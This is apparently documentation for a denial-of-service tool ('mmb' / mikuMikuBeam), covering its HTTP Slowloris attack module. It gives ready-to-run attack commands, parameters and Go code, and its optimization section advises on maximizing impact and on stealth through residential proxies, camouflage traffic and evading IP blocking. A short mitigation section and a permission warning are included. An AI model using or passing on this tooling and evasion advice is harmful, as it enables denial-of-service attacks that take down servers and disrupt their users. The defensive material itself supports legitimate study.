> ## Documentation Index
> Fetch the complete documentation index at: https://mintlify.com/sammwyy/mikuMikuBeam/llms.txt
> Use this file to discover all available pages before exploring further.

# HTTP Slowloris

> Slow HTTP attack that exhausts server connections by sending incomplete requests

## Overview

HTTP Slowloris is a low-bandwidth, high-impact denial of service attack that keeps HTTP connections open for as long as possible by sending partial HTTP requests. Unlike volumetric attacks, Slowloris requires minimal bandwidth and can take down a server with just a few hundred concurrent connections.

<Note>
  This attack exploits how web servers handle concurrent connections, not bandwidth.
</Note>

## How it works

The Slowloris attack operates by:

1. **Connection Establishment**: Opens raw TCP or TLS connection to the target server
2. **Partial Request**: Sends incomplete HTTP headers:
   ```http theme={null}
   GET / HTTP/1.1\r\n
   Host: example.com\r\n
   User-Agent: Mozilla/5.0...\r\n
   Accept: */*\r\n
   Connection: keep-alive\r\n
   ```
3. **Slow Drip**: Sends headers one at a time with delays between each
4. **Keep-Alive Headers**: Periodically sends `X-a: b\r\n` to keep connection alive
5. **Never Complete**: Intentionally never sends the final `\r\n\r\n` to complete the request
6. **Connection Pool Exhaustion**: Server keeps connections open waiting for complete headers
7. **Concurrent Threads**: Multiple threads each maintain slow connections

### Attack flow

```mermaid theme={null}
sequenceDiagram
    participant A as Attacker
    participant S as Target Server
    A->>S: TCP/TLS Connection
    A->>S: GET / HTTP/1.1\r\n
    Note over A,S: Wait (packet-delay)
    A->>S: Host: example.com\r\n
    Note over A,S: Wait (packet-delay)
    A->>S: User-Agent: ...\r\n
    Note over A,S: Wait (packet-delay)
    A->>S: Accept: */*\r\n
    Note over A,S: Wait (packet-delay)
    A->>S: Connection: keep-alive\r\n
    loop Every packet-delay
        A->>S: X-a: b\r\n
        Note over S: Connection still waiting
    end
    Note over S: Connection pool exhausted
```

## When to use

Slowloris is effective for:

* **Connection limit testing**: Test server's maximum concurrent connection handling
* **Timeout configuration validation**: Verify proper timeout settings
* **Resource exhaustion scenarios**: Simulate attacks that exhaust file descriptors/sockets
* **Load balancer testing**: Test if load balancers properly detect and close slow connections
* **Low-bandwidth attack simulation**: Demonstrate that DDoS doesn't always mean high traffic

<Warning>
  This attack can effectively DoS a server with minimal resources. Only use on systems you own or have explicit permission to test.
</Warning>

## Usage

Basic Slowloris attack:

```bash theme={null}
mmb attack http_slowloris https://example.com
```

With optimized parameters for maximum impact:

```bash theme={null}
mmb attack http_slowloris https://example.com \
  --duration 300 \
  --delay 5000 \
  --threads 500 \
  --verbose
```

### Parameters

<ParamField path="target" type="string" required>
  Target URL including protocol (http\:// or https\://)
</ParamField>

<ParamField path="--duration" type="int" default="60">
  Attack duration in seconds. Longer durations are more effective.
</ParamField>

<ParamField path="--delay" type="int" default="500">
  Delay between header packets in milliseconds. Higher = slower drip = longer connections.
</ParamField>

<ParamField path="--packet-size" type="int" default="512">
  Not used in Slowloris (kept for API consistency)
</ParamField>

<ParamField path="--threads" type="int" default="0">
  Number of concurrent slow connections (0 = number of CPU cores). Higher is more effective.
</ParamField>

<ParamField path="--verbose" type="boolean" default="false">
  Show detailed logs for each slow connection established
</ParamField>

<ParamField path="--no-proxy" type="boolean" default="false">
  Allow running without proxies. Note: Your IP will be exposed.
</ParamField>

## Expected behavior

### Console output

Standard mode:

```
Starting http_slowloris against https://example.com with 100 proxies
23:15:30 PPS:47 Total:47 Proxies:100
23:15:31 PPS:52 Total:99 Proxies:100
23:15:32 PPS:49 Total:148 Proxies:100
```

Verbose mode:

```
Starting http_slowloris against https://example.com with 100 proxies
Verbose mode enabled - showing detailed attack logs
23:15:30 PPS:47 Total:47 Proxies:100 [SOCKS5 proxy.example.com:1080 -> https://example.com]
23:15:31 PPS:52 Total:99 Proxies:100 [HTTP proxy2.example.com:3128 -> https://example.com]
```

### Connection behavior

* **Initial connection**: Quick TCP/TLS handshake
* **Header drip rate**: One header per `--delay` milliseconds
* **Keep-alive interval**: `X-a: b` header sent every `--delay` milliseconds after initial headers
* **Connection lifetime**: Remains open until server timeout or attack stops
* **Resource usage**: Minimal bandwidth, moderate memory per connection

## Technical implementation

Implementation details from `internal/attacks/http/slowloris.go:20-87`:

* **Raw socket usage**: Opens TCP/TLS connections directly (not via HTTP client)
* **Protocol detection**: Uses `tcp` scheme for HTTP, `tls` scheme for HTTPS
* **Port handling**: Defaults to 80 (HTTP) or 443 (HTTPS) if not specified
* **Proxy support**: Routes through SOCKS/HTTP proxies when available
* **Goroutine per connection**: Each connection runs in separate goroutine
* **Buffered writer**: Uses `bufio.Writer` for controlled header sending
* **Context awareness**: Respects cancellation for graceful shutdown

### Header sequence

```go theme={null}
headers := []string{
    "Host: " + host,
    "User-Agent: " + pickUA(ua),
    "Accept: */*",
    "Connection: keep-alive",
}
```

Each header is sent with flush and delay:

```go theme={null}
bw.WriteString(h + "\r\n")
bw.Flush()
time.Sleep(params.PacketDelay)
```

## Optimization strategies

<AccordionGroup>
  <Accordion title="Maximizing connection count">
    * Increase `--threads` to 500-1000 for maximum concurrent connections
    * Use `--delay 5000` (5 seconds) to keep connections open longer
    * Longer `--duration` ensures connections stay active
    * More proxies = more unique source IPs = harder to block
  </Accordion>

  <Accordion title="Balancing stealth vs impact">
    * Lower `--threads` (50-100) for stealthier attacks
    * Higher `--delay` (10000ms+) for slower, harder-to-detect drip
    * Use residential proxies to avoid data center IP blocking
    * Combine with other traffic for camouflage
  </Accordion>

  <Accordion title="Resource management">
    * Each thread maintains one slow connection at a time
    * Memory usage: \~4-8KB per active connection
    * CPU usage: Minimal (mostly idle waiting)
    * Network: \~100 bytes per second per connection
  </Accordion>

  <Accordion title="Server-side detection">
    * Monitor for incomplete HTTP requests
    * Track connection duration averages
    * Alert on high count of ESTABLISHED connections
    * Implement aggressive timeouts for header completion
  </Accordion>
</AccordionGroup>

## Mitigation techniques

If you're defending against Slowloris:

<Steps>
  <Step title="Implement request timeouts">
    Configure aggressive timeouts for incomplete HTTP requests (5-10 seconds).
  </Step>

  <Step title="Limit connections per IP">
    Restrict concurrent connections from single IP addresses.
  </Step>

  <Step title="Use reverse proxy">
    Deploy nginx, HAProxy, or similar to buffer requests before reaching application servers.
  </Step>

  <Step title="Enable ModSecurity or WAF">
    Configure rules to detect and block slow HTTP attacks.
  </Step>

  <Step title="Monitor connection states">
    Alert when ESTABLISHED connections exceed thresholds.
  </Step>
</Steps>

## Server-specific vulnerabilities

<Info>
  **Vulnerable servers**:

  * Apache HTTP Server (without `mod_reqtimeout`)
  * Basic Python/Node.js HTTP servers
  * Misconfigured IIS servers

  **Resistant servers**:

  * nginx (proper timeout config)
  * Apache with `mod_reqtimeout`
  * HAProxy / Cloudflare / CDNs with DDoS protection
</Info>

## Real-world example

Testing connection limit on Apache server:

```bash theme={null}
# Start with moderate settings
mmb attack http_slowloris https://test-server.example.com \
  --threads 200 \
  --delay 3000 \
  --duration 120 \
  --verbose

# Monitor server:
# watch -n 1 'netstat -an | grep :80 | grep ESTABLISHED | wc -l'

# Observe when server stops accepting new connections
# (MaxClients or connection limit reached)
```

## Related attack methods

<CardGroup cols={2}>
  <Card title="HTTP Flood" icon="water" href="/attacks/http-flood">
    High-volume HTTP request attack
  </Card>

  <Card title="HTTP Bypass" icon="shield-halved" href="/attacks/http-bypass">
    Stealth HTTP attack with browser mimicry
  </Card>

  <Card title="TCP Flood" icon="network-wired" href="/attacks/tcp-flood">
    Layer 4 TCP connection flood
  </Card>
</CardGroup>
